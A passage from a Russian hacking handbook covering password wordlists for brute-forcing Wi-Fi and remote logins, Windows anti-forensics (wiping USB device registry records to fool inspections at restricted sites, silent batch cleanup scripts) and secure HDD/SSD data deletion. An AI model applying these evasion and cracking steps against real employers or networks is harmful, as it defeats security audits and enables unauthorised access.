Названия словарей имеют говорящие названия. В основном эти словари предназначены для брутфорса удаленного входа в различные службы, имеются неплохие универсальные словари с именами пользователей и паролями. Находятся в каталоге /usr/share/wordlists/metasploit.

### 10.8.6. Словари Ncrack

Программа Ncrack имеет качественные списки слов для брутфорса удаленных служб. Словари располагаются в директории /usr/share/ncrack/ и разделены на имена пользователей и пароли.

### 10.8.7. Списки слов Nmap

Nmap поставляется с несколькими списками, среди которых имеется словарь с паролями. На Kali Linux все они размещены в папке /usr/share/nmap/ nselib/data/.

### 10.8.8. Словари Wfuzz

Wfuzz – это ещё один брутфорсер веб-приложений. В папке /usr/share/wfuzz/ wordlist/ можно найти разные подборки, в том числе слова, которые могут быть именами или паролями.

### 10.8.9. Словари дефолтных учетных записей для роутеров

Заводские (стандартные) имена пользователей и паролей встречаются на роутерах очень часто.

Программа Router Scan by Stas'M (*https://kali.tools/?p=501*) содержит хорошие подборки для digest- и basic-аутентификации.

Еще есть много сайтов, где можно найти заводские пароли для роутеров. Например, можно воспользоваться следующим сайтом: https://www. routerpasswords.com/. A сайт Default Passwords (https://open-sez.me/index. html) позволяет легко парсить дефолтные пароли под разные устройства.

### 10.8.10. Штатные словари различных программ

Многие словари поставляются с различными инструментами и даже вирусами. Все они предназначены для взлома паролей. Таблица 10.1 содержит название словаря и ссылку для скачивания.

Название	Описание	Ссылка
John the Ripper	Очень хороший словарь, поставляемый вместе с John the Ripper	https://kali.tools/files/passwords/ password_dictionaries/john.txt.bz2
Cain & Abel	В 100 раз больше, чем предыдущий, но не упо- рядоченный. Нужно ис- пользовать pw-inspector для разбора этого файла	https://kali.tools/files/passwords/ password_dictionaries/cain.txt.bz2
Conficker	Используется червем Conficker	https://kali.tools/files/passwords/ password_dictionaries/conficker.txt.bz2

Таблица 10.1. Штатные словари

Топ 500 худ- ших паролей	Название говорит само за себя	https://kali.tools/files/passwords/ password_dictionaries/500-worst- passwords.txt.bz2
Популярные пароли длиной > 10 символов	Содержит 2344 пароля. Используется в качестве стоп-слов платформой Discourse	https://kali.tools/files/passwords/ password_dictionaries/10-char- common-passwords.txt

Думаем, приведенных словарей будет вполне достаточно. Если тебе мало, можешь посетить следующую страничку, где ты найдешь дополнительные словари:

#### https://wiki.skullsecurity.org/Passwords

Для создания собственных словарей можно использовать следующие программы:

- Hashcat
- crunch
- statsprocessor
- maskprocessor

### 10.9. Итоги и реалии

С одной стороны, было показано, как легко можно взломать пароль от Wi-Fi-сети. С другой стороны, есть множество нюансов. Первый из них – необходимые знания и время. Не каждый человек будет разворачивать виртуалку вместе с Linux для взлома Wi-Fi. Конечно, если ты планируешь заниматься не только этим, тогда виртуалку с Kali Linux ты установил еще в главе 6. Но ради взлома соседского Wi-Fi заморачиваться... Даже не знаем. Тем более что перспективы самого взлома весьма туманны без хорошего файла с паролями. Где его взять? Ты уже знаешь. Кроме упомянутых источников есть целые сайты с генераторами списка паролей, есть сайты, которые выкладывают топ паролей. Например, в последних годах топ паролей выглядит так, как показано на рис. 10.15. А ты ожидал более сложные пароли?

A. ▲	Unv	vrap your NordPas	s Christmas dis	count	Spin the Wheel	
Sign	NordPass	How It Works Features Plans	Apps Blog Business		Help Login III	Point Carol
	Position	Password	Number of users	Time to crack it	Times exposed	
	1.+65	123456	2,643,305	Less than a second	23,597,311	
	2.1	123456789	961435	Less them a second	7,870,594	Carries a
	<b>3.</b> (new)	picture1	371,612	d Hours	11,150	
	4.10	password	360,462	Line thin a second	\$,709,316	
	<b>5. †</b> (6)	12345678	322,187	Less than is unicorid	2,944.615	
	6, † 🖓	ımın	E\$0.907	Lass than a second	5,174,369	
	7. 🕇 (15)	123123	189,327	Leis than a Leisond	2,238,604	Tartis de la recentra
	<b>8.</b> 4 10	12345	* 22.263	Leur than a second	2.369,727	1.000
	<b>9. †</b> (10)	1234567890	171,724	Lesis than a second	2,264.694	1
-	<b>10.</b> (1994)	s senha	167,728,	10 Septembe	6,213	1
	11. + (12)	1234567	65.909	Lass than a second	2.516.606	

Puc. 10.15. Топ паролей в предыдущих годах. Источник https://nordpass.com/ most-common-passwords-list/

Как защититься от взлома Wi-Fi? Да попросту используй пароль, который не является словарным словом, состоит из 10 символов (или более), содержит буквы/цифры и несколько специальных символов, например, \_, #, ?, !.

Пример:

Adh20 71#RYNT 955		12 Marting		
	AT A DE TAN			and the states

Вряд ли кто-то взломает этот пароль с помощью списка паролей. Есть, конечно, генераторы символьных последовательностей, но.... Перебор пароля из 17 символов посимвольно будет длиться вечность. К тому времени, пока ты его расшифруешь, возможно, произойдут три события:

- 1. Роутер жертвы выйдет из строя.
- 2. Жертва поменяет пароль по тем или иным причинам.
- 3. Ты состаришься.

Еще раз: взломать Wi-Fi можно, но перспективы весьма туманны. Но при определенном везении – все возможно.



## Глава 11.

## Заметаем следы

В этой главе речь пойдет о том, как скрыть свои следы при работе в Windows 10/11. Статья – вовсе не ноу-хау, практически все, что описано в ней, вам, скорее всего, уже знакомо. Смотрите на нее как на некий список TODO – чтобы ничего не забыть при очистке компьютера перед всевозможными проверками. Данный список пригодится, если вы работали за чужим компом или же при передаче компа, например при его продаже или просто передаче другом коллеге.

### 11.1. Очистка списков недавних мест и программ

Как правило, все современные операционки – семерка, десятка и другие – предательски следят за тобой и готовы по первому требованию предоставить всю необходимую информацию. Мы же разберемся, как эту информацию почистить. Начнем со списков недавних мест и программ. Список недавних (в десятке – часто используемых) программ хранится в главном меню (рис. 11.1), а список недавних мест – в проводнике (рис. 11.2).



Рис. 11.1. Список часто используемых программ в Windows 10

Отключить список недавно добавленных и часто используемых приложений можно через окно **Параметры**. Открой его и перейди в раздел **Персонали**зация, Пуск. Отключи все, что там есть (рис. 11.3).



Рис. 11.2. Список часто используемых папок и последних файлов

🔶 Параметры	and the second of the second	North an	-	0	×
ПЕРСОНАЛИЗАЦИЯ	Наяти	параметр			P
Фан	Пуск				
Linera	The second se				
Экран Бархировки	Откл.				
Темы	Паказывать недавно добавленные приложения		- 90		
Пуск	Открывать начальный экран в полноэкранном режиме				
Note that the second of the	Отка.				
	Показывать последние открытые элементы в списках переходов в меню "Пуск" и на панели задач				
and the second particular	Откл.				
	Выберите, какие папки будут отображаться в меню. Пус	r 1943 - 54			
and the second states of			1		
Martine Country San					

Рис. 11.3. Отключение хранения списка программ

Однако особо это проблему не решит. Так как если включить эти параметры снова наши списки в таком же составе вновь появятся. Поэтому придется отключать данную "фишку" через групповую политику. Открой gpedit.msc и перейди в раздел Конфигурация пользователя\Административные шаблоны\Меню "Пуск" и панель задач. Включи политики:

- Очистить журнал недавно открывавшихся документов при выходе.
- Очистка списка недавно использовавшихся программ для новых пользователей.
- Отключить слежение за действиями пользователя.
- Не хранить сведения о недавно открывавшихся документах.
- Удалить список "Недавно добавленные" из меню "Пуск".



Рис. 11.4. Групповая политика

Очистить недавние места в "десятке" проще. Открой Проводник, перейди на вкладку Вид, нажми кнопку Параметры. В появившемся окне отключи параметры Показать недавно использовавшиеся файлы на панели быстрого доступа и Показывать часто используемые папки на панели быстрого доступа. Также нажми кнопку Очистить (рис. рис. 11.5).



Рис. 11.5. Параметры папок Windows 10

Как видишь, у такой простой задачи, как очистка последних объектов, довольно непростое решение – ведь приходится применять редактирование групповой политики.

## 11.2. Очистка списка USB-накопителей

На некоторых режимных объектах к компьютеру разрешено подключать только флешки (накопители), зарегистрированные в журнале. Причем, как водится, журнал самый что ни есть обычный – бумажный. То есть сам компьютер никак не ограничивает подключение незарегистрированных накопителей. Не ограничивает, зато протоколирует. Если при проверке обнаружат, что пользователь подключал незарегистрированные накопители, у него будут проблемы. Разберемся, как помочь пользователю.

Загляни в разделы реестра:

[HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ [HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Enum\USB\

Вот они (рис. 11.6) – все твои накопители, которые ты подключал к своему компу.

📓 Редактор реестра	a Are all to and the		and the second second	- 0	×
Файл Правка Вид Избранное Справка					
Kownworep\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTC	DR	Strange Strange		Concernance of	
> > SNO     > > SNO     > > SNO     > > UAR     SNO     UR     SN     US     US     US     USS     USSNUT     USSNUT     USSNUT	へ Имя 創(По умолчанию)	Tun Reg_SZ	Значение (значение не присвоен	a)	
Social State (Second Second Seco					
III Disk&Ven, Generic-&Prod_SD/MMC/MS_PRO&Rev_1.0     III Disk&Ven_JetFlash&Prod_Transcend_4GB&Rev_8.07     IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII	0	and a stat			
Disk&Ven_StoreJet&/Prod_Transcend&Rev_     Uisk&Ven_WD&Prod_Elements_25A3&Rev_1019     Disk&Ven_WD&Prod_My_Passport_0748&Rev_1010	at she apply	partiti (Carlo			
S III Other&Ven.WD&Prod_SES_Device&Rev_1010     S III Handware Profiles     III Policies	a she was a				
> III Services > III Software	a statistica series				
HardwareConfig     N Input     Keyboard Lavout					
> 🎆 Maps	-		A REAL PROPERTY AND INCOME.	THE OWNER OF	inter 1

### Puc. 11.6. Раздел peecmpa HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\ Enum\USBSTOR

Казалось бы, нужно просто все здесь почистить. Но не так все просто. Во-первых, разрешения на эти ветки реестра установлены таким образом, что ты ничего не удалишь даже в "семерке", не говоря уже о "десятке".

Во-вторых, назначать права и разрешения вручную довольно долго, особенно, если накопителей много. В-третьих, права админа не помогут. В-четвертых, кроме этих двух разделов, нужно почистить еще и следующие:

- HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\MountPoints2\CPC\Volume
- HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\MountPoints2\
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\Class\ {36FC9E60-C465-11CF-8056-444553540000}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\Class\ {4D36E967-E325-11CE-BFC1-08002BE10318}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\ DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\ DeviceClasses\{53f5630a-b6bf-11d0-94f2-00a0c91efb8b}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\ DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control DeviceClasses\{56907941-3AFE-11D4-AE2C-00A0CC242D2C}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Control\ DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}
- HKEY\_LOCAL\_MACHINE\SYSTEM\ControlSet001\Enum\STORAGE\ RemovableMedia
- HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\{3abf6f2d-71c4-462a-8a92-1e6861e6af27}
- KEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- KEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\{53f5630a-b6bf-11d0-94f2-00a0c91efb8b}
- HKEY\_LOCAL\_MACHINE\SYSTEM\MountedDevices

Эти разделы нужно не просто удалить, а правильным образом почистить. Скажем так, если ты сегодня узнал, что завтра проверка, придется остаться на ночь. Или использовать специальную программу. На некоторых форумах, где решается этот вопрос, рекомендуют программу USBDeview. Однако я ее протестировал и заявляю, что она вычищает информацию далеко не со всех разделов. Разделы USBSTOR и USB все еще содержат информацию о подключаемых носителях. А это первые разделы, куда будут смотреть проверяющие.

Могу порекомендовать программу USB Oblivion (http://www.cherubicsoft. com/en/projects/usboblivion). Запусти ее, включи параметр Do real clean (simulation otherwise) (параметр Save backup .reg-file можешь включить или выключить, но если цель – не проверка программы, а реальная проверка на работе, то лучше выключить) и нажми кнопку Clean.

I∾ USBOblivion 64-bit	Angeler ster	- 0	×
A WARNINGI Eject all flash drives before cleaning please.			1
Press "Clean" button to begin cleaning.			
and all all and a second second second	1.		
SAL TRANSPORT AND A SHELL FRE			
Do real clean (simulation otherwise)			
Save backup .reg-file			
Close Windows Explorer (RECOMMENDED)			1.
Reboot Windows (RECOMMENDED)	Clean	Đ	dt
in the second seco		AND STREET DOOLS	1247

Рис. 11.7. Программа USBOblivion

Программа не только делает очистку, но и выводит подробный лог своих действий (рис. 11.8). По окончании ее работы не останется упоминаний о подключении каких-либо накопителей к компьютеру. Чтобы не было подозрительно, нужно подключить к нему зарегистрированный (разрешенный) носитель – чтобы хоть один носитель, но был.



Рис. 11.8. Программа USBOblivion в действии

## 11.3. Очистка кэша и истории браузеров

Третий пункт в нашем ТООО – очистка кэша и журнала браузеров. Хорошо, если ты используешь один браузер, если же нет, то придется чистить все:

- Edge очистить список загруженных файлов и все журналы можно с помощью комбинации клавиш Ctrl + Shift + Del. Просто нажми соответствующие ссылки. При очистке журнала нужно выбрать все чекбоксы и нажать кнопку **Очистить**.
- Firefox открой настройки, перейди в раздел Приватность и защита, нажми кнопку Удалить данные, выбери все переключатели, нажми кнопку Удалить.
- Chrome нажми Ctrl + Shift + Del, на появившейся странице выбери очистку за все время, отметь все чекбоксы и нажми кнопку Удалить данные.
- Opera используем всю ту же комбинацию: нажми Ctrl + Shift + Del, на появившейся странице выбери очистку за все время, отметь все чекбоксы и нажми кнопку Удалить данные.
- IE да кто его использует? Рекомендации ты найдешь на сайте Майкрософта.

Рис. 11.9. Очистка браузера Opera

В результате ты не только сотрешь следы, но и сэкономишь место на диске. А чтобы на рабочем компьютере не приходилось чистить журналы браузера, все личные сайты посещай в режиме инкогнито. Конечно, админ при желании увидит лог на шлюзе, но на твоем компьютере все будет чисто. Оптимальное решение – использовать Тог. В этом случае даже админ не увидит, какие сайты ты посещаешь (при условии, что за твоей спиной нет камеры наблюдения).

## 11.4. Удаляем записи DNS

Узнать, какие сайты ты посещал, можно не только из журнала браузера, но еще и из кэша DNS. Когда ты вводишь адрес сайта в браузере, то твой комп обращается к DNS, чтобы разрешить имя сайта в IP-адрес. Кэш разрешенных ранее имен хранится на твоем компе. Просмотреть его можно командой ipconfig /displaydns. Вывод приводить не буду, он слишком длинный. Для очистки этого кэша используется другая команда – ipconfig /flushdns.

## 11.5. Очистка Flash Cookies

За тобой следят все, кому не лень. Даже flash-плейер и тот отслеживает твои посещения. Flash Cookies собираются в каталоге %appdata%\Macromedia Flash Player\#SharedObjects. Что с ним сделать, ты уже догадался:

```
cd %appdata%\Macromedia\Flash Player\#SharedObjects
echo y | del *.*
```

Вообще команду *del* можно вводить и с одной звездочкой (\*), но с двумя (\*.\*) мне как-то больше нравится.

# 11.6. Удаление списка последних документов MS Office

Для удобства пользователей список последних документов хранят все программы офисного пакета. В новых версиях Office нужно в параметрах перейти в раздел "Advanced", установить число последних документов = 1 (обрати внимание, на рис. 11.10 есть два параметра, которые нужно установить в 1). Значение 0 программа не позволяет установить, поэтому устанавливаем 1, а затем открываем какой-то безобидный файл.



Рис. 11.10. Параметры MS Word 2016

## 11.7. Автоматизируем очистку с помощью CCleaner

Обратите внимание, что нам нужна CCleaner Desktop, а не CCleaner Cloud. Последняя стоит денег, а ее функционал значительно шире, чем нам нужно. Переходим по http://www.piriform.com/ccleaner и выбираем Free-версию.

Чем мне нравится CCleaner, так это тем, что она:

- Поддерживает последние версии Windows, последние версии браузеров, в том числе Edge (в отличие от Free History Eraser);
- Может очистить не только систему, но и приложения (рис. 11.11);
- Программа может работать в batch-режиме, и дальше будет показано, как вызвать процесс "уборки" из командного файла.



Рис. 11.11. Очистка системы (CCleaner)

Использовать ее просто – выбери те элементы, которые ты хочешь очистить, и нажми кнопку **Очистка**.

## 11.8. Реальное удаление файлов

Все мы знаем, что при удалении файл на самом деле не удаляется. Удаляется только запись о нем, а сами данные все еще продолжают существовать гдето на диске. Поэтому для полного удаления информации нужно использовать специальные wipe-утилиты, которые затирают свободное пространство диска случайными данными.



Рис. 11.12. Очистка приложений (CCleaner)

После такого восстановить файлы не получится. В этой статье мы уже много чего удаляли, поэтому самое время затереть свободное пространство, чтобы нельзя было ничего восстановить.

Существует много утилит для затирания информации. Но мы будем использовать то, что уже у нас есть, а именно CCleaner. Зайди в Сервис, Стирание дисков, выбери диск, какой хочешь стереть, что стирать – Только свободное место и способ стирания. Приложение поддерживает несколько стандартов стирания – от самого простого, подразумевающего одну перезапись, до метода Гутмана (35 проходов).

**Примечание.** Об удалении информации мы более подробно поговорим в следующей главе.



Рис. 11.13. Стирание свободного места

CCleaner – далеко не единственная программа. Есть много подобных программ. Например, BCWipe, с функциями которой ты можешь ознакомиться по адресу http://www.jetico.com/wiping/61-accordion-ru-2/558-acc-ru-2-2.

Она может не только стирать свободное пространство, она может выполнять в том числе стирание файла подкачки, который также может содержать конфиденциальную информацию. Ее недостаток в том, что она платная, но для одноразового стирания (например, перед проверкой) подойдет и trial-версия – она бесплатная.

## 11.9. Создаем bat-файл для очистки всего

Теперь попытаемся автоматизировать некоторые описанные ранее операции. Начнем с удаления файлов из каталога **Recent**. Удалять командой *del*, как было показано выше, – можно, но лучше сразу использовать CCleaner для безопасного удаления:

```
\nytb\CCleaner.exe /delete "%appdata%\Microsoft\Windows\Recent\*" 1
\nytb\CCleaner.exe /delete %appdata%\microsoft\windows\recent\
automaticdestinations\*" 1
\nytb\CCleaner.exe /delete "%appdata%\Macromedia\Flash
Player\#SharedObjects" 1
```

К сожалению, CCleaner нельзя вызвать так, чтобы она почистила в режиме командной строки все свободное пространство, поэтому придется удалять файлы через нее, а не командой *del* или же использовать команду *del*, а потом вручную запустить ее и вызвать очистку свободного пространства. Последний параметр (1) означает удаление с тремя проходами. Это оптимальный режим, поскольку с одним проходом (0) – слишком просто, а все остальные – слишком долго.

С параметрами командной строки CCleaner можно ознакомиться по адресу:

http://myccleaner.net/ccleaner-ndash-parametryi-komandnoy-stroki/

Зато в командном режиме можно удалить USB-накопители:

\путь\USBOblivion.exe -enable -auto -nosave -silent

Первый параметр запускает реальную очистку, а не симуляцию. Второй – работу в автоматическом режиме (тебе не придется нажимать кнопку), файлы .reg сохраняться не будут (-nosave), а параметр -*silent* означает работу в тихом режиме – как раз для командной строки.

Далее нужно запустить CCleaner с параметром /AUTO для автоматической очистки по умолчанию, но в ее результате не очищается кэш DNS, поэтому его придется очистить вручную:

```
путь\CCleaner.exe /AUTO
ipconfig /flushdns
```

Собственно, у нас получился вот такой сценарий:

\путь\CCleaner.exe /delete "%appdata%\Microsoft\Windows\Recent\\*" 1 \путь\CCleaner.exe /delete %appdata%\microsoft\windows\recent\automaticdestinations\\*" 1 \путь\CCleaner.exe /delete "%appdata%\Macromedia\Flash Player\#SharedObjects" 1 \путь\USBOblivion.exe -enable -auto -nosave -silent

путь\CCleaner.exe /AUTO ipconfig /flushdns

# 11.10. Создаем AutoHotkey-скрипт для очистки всего

Теперь напишем немного другой сценарий. Он будет запускать браузер Chrome в режиме инкогнито, после твоей сессии в Chrome (будет задан WinWaitClose) мы запустим CCleaner для автоматической очистки (будет удален кэш браузера и временные файлы), а после этого очистим кэш DNS.

Сценарий будет выглядеть так:

Run, C:\path\to\chrome.exe -incognito WinWait, - Google Chrome WinWaitClose Run, C:\nytb\ccleaner.exe /AUTO Run, cmd /c "ipconfig /flushdns" MsgBox, Browsing Session is Cleaned.

Если ты используешь Firefox, то измени первую строчку, указав путь к Firefox, а вот в качестве параметра нужно указать *-private*.

Для запуска этого сценария тебе понадобится AutoHotKey:

https://autohotkey.com/



## Глава 12.

## Полное удаление данных

В прошлой главе был затронут вопрос об удалении данных после очистки своих следов использования компьютера. Ведь мало следы удалить, важно удалить их без возможности восстановления. Безопасное удаление данных может понадобиться и в мирных целях – когда нужно подарить или продать носитель данных (диск, флешку, компьютер с носителем данных и т.д.). Поскольку на носителе могут быть персональные данные (например, платежная информация), никому не хочется, чтобы их использовали в корыстных целях.

### 12.1. Стираем инфу с жесткого диска

Способы безвозвратного уничтожения информации сильно зависят от типа устройства. Сейчас мы поговорим о том, как уничтожить инфу на классическом жестком диске, не SSD. О твердотельных дисках (SSD) мы поговорим далее в этой статье.

Традиционный способ уничтожения данных – форматирование.

Вот только, как показывает практика, после форматирования данные относительно просто восстановить. Особенно, если использовалось быстрое форматирование. Совсем другое дело – полное форматирование.

Если на жестком диске никакой ценной информации нет, достаточно несколько раз его отформатировать, используя полное форматирование – флажок Быстрое нужно снять.
рорматирование Elements (E:)	×
Емкость:	
2,72 ТБ	~
Файловая система:	
NTFS (по умолчанию)	· ·
Размер единицы распределения:	
4096 байт	×
Восстановить параметры по умолцанию	]
Восстановить параметры по умолцанию Метка тома:	]
Восстановить параметры по умолцанию <u>М</u> етка тома: Elements Способы фолкатипование:	]
Восстановить параметры по умолцанию Метка тома: Elements Способы форматирования:	]
Восстановить параметры по умолцанию Метка тома: Elements Способы форматирования: Быстрое (очистка оглавления)	]
Восстановить паранетры по умолцанию Метка тома: Elements Способы форматирования: Быстрое (очистка оглавления)	]
Восстановить паранетры по умолцанию Метка тома: Elements Способы форматирования: Быстрое (очистка оглавления)	

Рис. 12.1. Полное форматирование диска

Но что делать, если наблюдаются приступы паранойи или же жесткий диск действительно содержит ценную информацию, которая не должна попасть в чужие руки? В этом случае нужно использовать алгоритмы гарантированного уничтожения информации.

В США использовался стандарт DoD 5220.22-М. Стандарт подразумевал трехкратную перезапись диска. При первом проходе выполняется запись любого символа, затем – его XOR-варианта, а после (третий проход) – случайной последовательности. Получается, что за три прохода каждый байт информации на жестком диске перезаписывался так:

10101010 > 01010101 > 11011100 (последнее значение - случайное)

Действительно, раньше такой алгоритм использовался в государственных учреждениях США. Но, видимо, он не обеспечивает должной надежности, поскольку сейчас носители физически размагничивают или даже полностью уничтожают. А DoD 5220.22-М используется только для уничтожения несекретной информации.

В Канаде используется утилита DSX. Утилита работает так: сначала перезаписывает инфу нулями, а потом – единицами, после чего записывает на диск последовательность данных, в которой закодирована информация о версии утилите, дате и времени уничтожения информации. В Германии для уничтожения несекретных данных (а у нас, мы надеемся, именно такие) используется стандарт BSI VSITR (расшифровку аббревиатуры вы без проблем найдете в Интернете, если она вам нужна). Стандарт подразумевает от 2 до 6 проходов, на каждом из которых на диск записывается псевдослучайная последовательность и ее XOR-эквивалент. Последним проходом записывается последовательность 01010101.

Какой алгоритм выбрать? Для всех современных жесткий дисков для окончательного удаления информации достаточно один раз перезаписать их псевдослучайной последовательностью, все что более – делается исключительно для самоуспокоения и никак не влияет на результат.

# 12.2. Приложения для безопасного удаления данных с жестких дисков

Приложений для безопасного удаления достаточно много – Secure Erase (https://partedmagic.com/secure-erase/), DBAN (https://dban.org/) и т.д. Выбор утилиты зависит от предпочтений пользователя. Мы рекомендуем выбирать только OpenSource-утилиты, исходный код которых доступен. Важно, чтобы утилита выполняла именно удаление, а не шифрование информации.

Представим, что утилита информацию перезапишет не случайной последовательностью данных, а зашифрованной каким-то ключом версией данных пользователя, то есть попросту зашифрует информацию. Пользователь будет считать, что информацию удалил, а кто-то сможет ее «восстановить» путем дешифровки.

Приложение **DBAN** является как раз OpenSource – его исходный код доступен всем желающим и настоящие параноики могут даже откомпилировать его из исходников, чтобы быть уверенными в том, что утилита действительно делает то, что нужно.

Впрочем, можно обойтись и без всяких утилит. Для этого достаточно зашифровать диск с помощью BitLocker. А после этого – отформатировать диск быстрым форматированием (для дополнительной надежности можно использовать полное). При форматировании томов BitLocker (даже при быстром) уничтожается и криптографический ключ, что делает невозможным восстановление информации. Так что BitLocker можно использовать не только для шифрования данных, но и как способ быстрого и безвозвратного их удаления. Важно только, чтобы не нашлась копия ключа. Нужно убедиться, что ключ не загружается в облако OneDrive. При использовании учетной записи Microsoft проверить наличие дополнительных ключей можно по адресу https://account.microsoft.com/devices/recoverykey.

#### 12.3. Удаление информации с SSD

Безвозвратно удалить данные с SSD сложнее, чем с обычного жесткого диска. Чтобы удалить ее действительно надежно, нужно понимать, как происходит удаление информации с SSD.

Микросхемы памяти, которые используются в SSD-накопителях, позволяют очень быстро считать информацию, чуть медленнее записать ее в чистый блок и совсем медленно они записывают в блок, в котором уже есть другие данные. Больше всего нас интересует как раз третий вариант – ведь нам нужно имеющуюся информацию перезаписать другой информацией.

Чтобы записать данные в ячейку, контроллер SSD должен сначала стереть данные в этой ячейке, а затем уже записывать новые. Поскольку сей процесс не очень быстрый, производители SSD разработали ряд оптимизационных алгоритмов, благодаря которым в распоряжении контроллера всегда есть нужное количество пустых ячеек, то есть в большинстве случаев при записи информации на SSD она записывается в чистую, а не уже использованную ячейку. Именно поэтому когда SSD диск новый и пустой, он работает быстрее, чем когда уже на нем есть информация и чем больше информации на SSD, тем медленнее он работает.

Что случится, если ОС захочет записать данные в ячейку с определенным адресом, но по этому адресу уже есть какие-то данные? Тогда контроллер SSD выполнит подмену адресов: нужный адрес будет назначен другой – пустой ячейке, а занятый блок или получит другой адрес или уйдет в неадресуемый пул для последующей фоновой очистки.

Вот здесь и начинается безудержное веселье. Оказывается, информация просто-напросто не удаляется с SSD. Когда-то она, конечно, будет удалена, но должно пройти время. Пользователь думает, что удалил файл, но на самом деле информация осталась на диске. Пользователь думает, что перезаписал файл нулями, на самом деле он записал нулями неиспользуемые ячейки, а ячейки с данными остались в целости и сохранности. Все это существенно усложняет нашу задачу. Получается, что при обычном использовании на диск записывается больше данных, чем он может вместить. Пул свободных ячеек сокращается и настает момент, когда контроллеру становится доступным лишь пул из неадресуемого пространства. Данная проблема решается с помощью механизма Trim, который работает совместно с ОС. Если пользователь удаляет какой-то файл, форматирует диск или создает новый раздел, система передает контроллеру информацию о том, что определенные ячейки не содержат полезных данных и могут быть очищены.

Самое интересное, что в результате работы Trim сама ОС не перезаписывает эти блоки, то есть не стирает информацию физически. Она просто передает информацию контроллеру SSD, с этого момента начинается фоновый процесс (или может начаться – все решает контроллер) удаления информации.

Что случится, если хакер попытается считать данные из ячеек, на которые поступила команда Trim, но которые не очищены физически. Тут все зависит от типа контроллера. Существуют три типа контроллеров, точнее три алгоритма работы контроллеров:

- 1. Non-deterministic trim контроллер может вернуть фактические данные, нули или еще что-то, причем результат может отличаться между попытками. При первой попытке это могут быть нули, при второй – единицы, при третьей – фактические данные.
- 2. Deterministic trim (DRAT) контроллер возвращает одно и то же значение (чаще всего нули) для всех ячеек после команды Trim.
- 3. Deterministic Read Zero after Trim (DZAT) гарантированное возвращение нулей после Trim.

Узнать тип контроллера в Linux можно так:

\$ sudo hdparm -I /dev/sda | grep -i trim \* Data Set Management TRIM supported (limit 1 block) \* Deterministic read data after TRIM

Контроллеры первого типа сейчас практически не встречаются. Ранее подобным поведением отличались накопители стандарта eMMC. На данный . момент они практически все успешно вымерли, как мамонты. Как правило, на обычных ПК сегодня используется диски второго типа, третий тип используется только на дисках, предназначенных для работы в составе многодисковых массивов. Казалось бы все просто. Если у нас есть контроллер даже со вторым типом Trim, то для ячейки, помеченной на удаление, мы гарантировано получим нули. Но не тут то было.

А Trim вообще включен и поддерживается ОС? Поддержка Trim есть только в Windows 7 и более новых ОС. Но только при соблюдении ряда условий. Первое условие – диск должен быть подключен напрямую по SATA/NVME, для USB-накопителей Trim не поддерживается (бывают приятные исключения, но это исключения). Второе - Trim поддерживается только для NTFSтомов. Третий момент – Trim должны поддерживать, как драйверы диска/ контроллера, так и BIOS.

Проверить работоспособность trim в Windows можно с помощью команды:

fsutil behavior query DisableDeleteNotify

C:\Windows\s	system32\cmd.exe	1.1.1		×
Microsoft Wind (c) Корпорация	iows [Version 10.0.16299.726] ∋ Майкрософт (Microsoft Corporation), 2017. Все права защищены.		14 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1	î
8dot3name behavior dirty file fsinfo hardlink objectid quota	Управление 8dot3name Управление поведением файловой системы Управление "грязным" битом тома Команды управления файлом Сведения о файловой системе Управление жеткими связями Управление идентификаторами объектов Управление ковтами			
repair reparsepoint resource sparse tiering transaction usn volume wim	Управление самовосстановлением Управление точками повторного анализа Управление диспетером ресурсов транаакций Управление равреженными файлами Управление свойствами иногоуровневых хранилищ Управление транаакциями Управление USN Управление томами Прозрачние о управление хостингом WIM			
C:\Users\Den> NTFS DisableDe ReFS DisableDe	fsutil behavior query DisableDeleteNotify eleteNotify = 0 eleteNotify не установлен			
C:\Users\Den>				

Рис. 12.2. Команда fsutil

Значение 0 (см. рис. 2) означает, что trim включен и работает корректно. Значение 1 – trim выключен. Для USB-дисков с большей вероятностью Trim будет выключен. Остановить процесс сборки мусора невозможно. Если на SSD-диск подается питание, то контроллер будет продолжать уничтожать данные после Trim. Но если данные очень ценные, то можно извлечь из накопителя чипы памяти и с помощью специального оборудования – считать их. Да, это сложно, да, из-за фрагментации данных – очень сложно, но такую задачу решить все же можно.

Если подытожить, то с SSD ситуация складывается следующим образом:

- Примерно 10% (в некоторых накопителях чуть меньше) емкости SSD отводится под резервный неадресуемый пул. В теории ячейки этого пула должны очищаться, но на практике это происходит не всегда из-за много-численных особенностей реализации и банальных ошибок в прошивке данные из этого пула можно достать.
- Мгновенно удалить данные с SSD с включенным Trim можно путем форматирования раздела как NTFS: trim пометит блоки как неиспользуемые, а контроллер постепенно удалит информацию из них.
- Если все прошло правильно, восстановить информацию будет невозможно. Даже если подключить SSD к другому компьютеру или специальному стенду, контроллер продолжит затирать инфу.
- Если же из SSD извлечь микросхемы, то данные можно будет считать

Как надежно уничтожить содержимое SSD-диска?

